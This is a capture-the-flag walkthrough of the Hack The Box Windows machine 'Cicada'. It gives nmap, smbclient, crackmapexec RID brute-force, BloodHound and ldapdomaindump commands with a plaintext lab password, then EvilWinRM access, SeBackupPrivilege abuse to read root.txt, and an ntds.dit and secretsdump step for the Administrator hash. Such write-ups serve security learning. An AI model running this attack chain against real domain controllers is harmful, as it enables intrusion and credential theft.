HTB | Cicada

This is a Windows box. You can find it here.

Skill Learned

• ldapdomaindump / bloodhound

• SeBackupPrivelege

NMAP

IP: 10.10.11.35

nmap -sT -p- --min-rate 10000 10.10.11.35 -Pn

nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,59969 10.10.11.35 -Pn

nmap

SMB & RPC

smbclient -L 10.10.11.35 -N

There was a file in the HR share

smbclient //10.10.11.35/HR

Since we have a password we can enum for the user

LDAP - TCP 389

ldapsearch -H ldap://10.10.11.35 -x -s base namingcontexts

ldapsearch -H ldap://10.10.11.35 -x -s base namingcontexts

Foothold/shell

Without creds, one thing I can check for is usernames via Kerberos brute-forcing. I’ll use Kerbrute to give this a run, and it finds four unique usernames:

./kerbrute userenum -d cicada.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.11.35

It is taking alot of time. we can use crackmapexec to brute-force rid

crackmapexec smb 10.10.11.35 -u anonymous -p "" --rid-brute

crackmapexec smb 10.10.11.35 -u anonymous -p "" --rid-brute

from this, we have 5 users

user.txt

Let's see if the password we got has a valid user or not for smb

and we get a user michale.wrightson. Let's take a look at what share access michale have

It's the same access we have before Let's try Evilwinrm, but no luck

Bloodhound/ ldapdomaindump

Since we have valid domain cred we can use bloodhound

bloodhound-python -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb -ns 10.10.11.35 -c All

bloodhound-python

Let's load the files in Bloodhound

Not able to find anything useful from the owned user (michale.wrightson)

Let's try ldapdomaindump because it gives us a nice HTML file

sudo python3 /opt/ldapdomaindump/ldapdomaindump.py ldaps://10.10.11.35 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'

ldapdomaindump

We found the password for david.orelious

Let's try for SMB and WinRm, we can only validate for smb

This time we have READ ONLY to DEV share

We found backup_script.ps1 in DEV share. Lets download the script to our system and take a look.

The file has cred for emily.oscar Let's try for SMB and WinRm, we can validate for both

Let's use EvilWinRM

and we are in

found user.txt

user.txt

Priv Esc

SeBackupPrivelege

whoami /priv

we have SeBackupPrivelege privilege, we have seen the same privilege in Blackfield.

SeBackUpPrivilege basically allows for a full system read. This is because emily.oscars is in the Backup Operators group:

This repo has a nice set of PowerShell tools for abusing the SeBackupPrivilege. I’ll clone it, and then I’ll need to upload two files to Cicada:

Now I'll import them into my current session:

now we can copy root.txt

Copy-FileSeBackupPrivilege C:\Users\Administrtor\Desktop\root.txt root.txt

Beyond root.txt

We can copy ntds.dit and system

and transfer it to kali and use secretsdump.py from secretsdump.py we will get the hash for the Administrator.